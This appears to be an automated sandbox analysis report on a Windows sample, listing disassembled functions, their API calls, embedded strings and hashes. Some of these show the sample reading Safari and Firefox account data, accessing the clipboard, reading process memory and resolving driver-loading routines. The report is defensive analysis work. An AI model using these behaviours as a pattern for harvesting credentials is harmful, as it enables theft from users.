                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                                                                                • String ID: OsError 0x%x (%u)
                                                                                                                • API String ID: 403622227-2664311388
                                                                                                                • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041183A Relevance: 4.5, APIs: 3, Instructions: 44fileclipboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                • OpenClipboard.USER32(?), ref: 00411878
                                                                                                                • GetLastError.KERNEL32 ref: 0041188D
                                                                                                                • DeleteFileW.KERNEL32(?), ref: 004118AC
                                                                                                                  • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                                                  • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                  • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                  • Part of subcall function 004098E2: GlobalFix.KERNEL32(00000000), ref: 00409927
                                                                                                                  • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                  • Part of subcall function 004098E2: GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                                                                                  • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                  • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                  • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastNameOpenPathReadSizeWindowsWire
                                                                                                                • String ID:
                                                                                                                • API String ID: 1203541146-0
                                                                                                                • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                                • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                                                                                • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                                • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Version
                                                                                                                • String ID:
                                                                                                                • API String ID: 1889659487-0
                                                                                                                • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                                • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                                                • memset.MSVCRT ref: 0040265F
                                                                                                                • memcpy.MSVCRT ref: 0040269B
                                                                                                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                • memcpy.MSVCRT ref: 004026FF
                                                                                                                • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                                • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                • API String ID: 577499730-1134094380
                                                                                                                • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                                • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                                • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                • String ID: :stringdata$ftp://$http://$https://
                                                                                                                • API String ID: 2787044678-1921111777
                                                                                                                • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                • GetDC.USER32 ref: 004140E3
                                                                                                                • wcslen.MSVCRT ref: 00414123
                                                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                • _snwprintf.MSVCRT ref: 00414244
                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                • String ID: %s:$EDIT$STATIC
                                                                                                                • API String ID: 2080319088-3046471546
                                                                                                                • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                • memset.MSVCRT ref: 00413292
                                                                                                                • memset.MSVCRT ref: 004132B4
                                                                                                                • memset.MSVCRT ref: 004132CD
                                                                                                                • memset.MSVCRT ref: 004132E1
                                                                                                                • memset.MSVCRT ref: 004132FB
                                                                                                                • memset.MSVCRT ref: 00413310
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                • memset.MSVCRT ref: 004133C0
                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                • memcpy.MSVCRT ref: 004133FC
                                                                                                                • wcscpy.MSVCRT ref: 0041341F
                                                                                                                • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                Strings
                                                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                • {Unknown}, xrefs: 004132A6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                • API String ID: 4111938811-1819279800
                                                                                                                • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                • String ID:
                                                                                                                • API String ID: 829165378-0
                                                                                                                • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00404172
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                • wcscpy.MSVCRT ref: 004041D6
                                                                                                                • wcscpy.MSVCRT ref: 004041E7
                                                                                                                • memset.MSVCRT ref: 00404200
                                                                                                                • memset.MSVCRT ref: 00404215
                                                                                                                • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                • wcscpy.MSVCRT ref: 00404242
                                                                                                                • memset.MSVCRT ref: 0040426E
                                                                                                                • memset.MSVCRT ref: 004042CD
                                                                                                                • memset.MSVCRT ref: 004042E2
                                                                                                                • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                • wcscpy.MSVCRT ref: 00404311
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                • API String ID: 2454223109-1580313836
                                                                                                                • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                • memcpy.MSVCRT ref: 004115C8
                                                                                                                • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                • API String ID: 4054529287-3175352466
                                                                                                                • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                • API String ID: 3143752011-1996832678
                                                                                                                • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                • API String ID: 667068680-2887671607
                                                                                                                • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                • API String ID: 1607361635-601624466
                                                                                                                • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf$memset$wcscpy
                                                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                • API String ID: 2000436516-3842416460
                                                                                                                • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                  • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
